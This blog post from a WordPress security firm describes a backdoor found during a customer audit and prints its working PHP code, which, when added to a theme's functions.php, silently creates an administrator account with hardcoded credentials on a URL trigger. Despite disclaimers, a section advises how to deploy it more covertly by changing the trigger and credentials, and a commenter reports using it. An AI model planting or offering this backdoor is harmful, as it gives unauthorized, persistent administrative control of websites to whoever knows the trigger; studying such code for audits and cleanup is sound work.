WordPress Backdoor to Create Administrator Account

Last updated on December 06th, 2014 by Robert Abela. Filed under WordPress Security Hacks

While doing a WordPress security audit and WordPress security lock down for one of our customers, I noticed he had a WordPress password backdoor installed on his WordPress installation. The WordPress backdoor is a very simple, yet powerful PHP script which can be triggered by accessing a specific URL using a normal web browser, such as Google Chrome of Firefox.

Once the WordPress backdoor is triggered, a new WordPress user with Administrator role is automatically created on the customer’s WordPress website, which a malicious user can use to regain access to someone’s WordPress installation any time he or she wants. In this post we will have a look at this WordPress backdoor’s code and explain how it works.

Note: This post is for educational and learning purposes ONLY. In fact we DO NOT recommend anyone to use such a backdoor in his or her WordPress installation.

WordPress Backdoor

The WordPress backdoor is listed in the below example. It is a simple PHP function that can be added to the WordPress theme’s functions.php file.

<?php
add_action('wp_head', 'WordPress_backdoor');

function WordPress_backdoor() {
    If ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        If (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>

The backdoor can be triggered by accessing the URL http://www.wpwhitesecurity.com?backdoor=go (if installed on www.WP White Security.com (this is a NON working example)).

How Does the WordPress Password Backdoor Work?

Using the above example, once the WordPress backdoor is triggered a new WordPress administrator account is created with the following credentails:

User:  backdooradmin
Password: Pa55W0rd

Using the WordPress Backdoor

If you would like to use the above WordPress backdoor for whatever reason you might have, use a different URL (by changing the GET variable and value on line 5) from the one specified in the above exampled. Also use a strong username and password (specified on line 8).

WP White Security Tip: We DO NOT recommend you to use such WordPress backdoor. This information in this post should only be used for educational and learning purposes.

Please note that by posting information about this WordPress backdoor online, we are not exposing anything malicious. For someone to create such backdoor, he or she would need FTP access to your WordPress website. If someone manages to gain FTP access to your WordPress website, there are many other things you should worry about rather than this WordPress backdoor.

If you would like to make a WordPress Security Audit, pimp up the security of your WordPress installation or need any type of WordPress professional support, drop us an email on help@wpwhitesecurity.com.

WordPress Hosting, Firewall and Backup

WP White Security is hosted on A2 Hosting, protected with BBQ:Block Bad Queries Firewall and backed up with BlogVault online WordPress backup service

4 comments

Tico 14/12/2012

Hi, the script works as you explain but I keep getting this error “You do not have sufficient permissions to access this page.” Even after I log out and then use the normal admin access, I can see the new account made along with the user role being admin but I still get the error. I am using 3.4.2 Please help

John Bonello 14/12/2012

Hi Tico,

Thank you for following our blog. We are willing to assist you solve your issue, but due to the sensitivity of the issue (i.e. a WordPress backdoor implementation) contact us directly via our contact form since we need to verify that you are the owner of the website you are working on.

Joni 24/09/2018

Guys, I need to erase an entire post along with its corresponding photos in my blog. But whenever I sign in and look at my dashboard, the post isn’t there. Impossible to delete something that doesn’t exists, right? But when I web search or view the blog site, the post and photos are there. What’s happening here? No, I did not use that reality stone on my blog.

Here’s my WordPress blog — jonianzures.wordpress.com and I want to completely remove the post “Janet and Niña at SM City – Marilao” and its pictures. Many thanks, amigos!

You can delete it from there or just me how to dowg it.

Robert Abela 03/10/2018

Thanks for reaching out Joni. We do not provide such services but may I recommend you to read how to clean a hacked WordPress website?

Note that the article is introductory and if you do not have experience with these things, you’d be better off paying someone professional to check the website for you.

Leave a Reply

Your email address will not be published. Required fields are marked *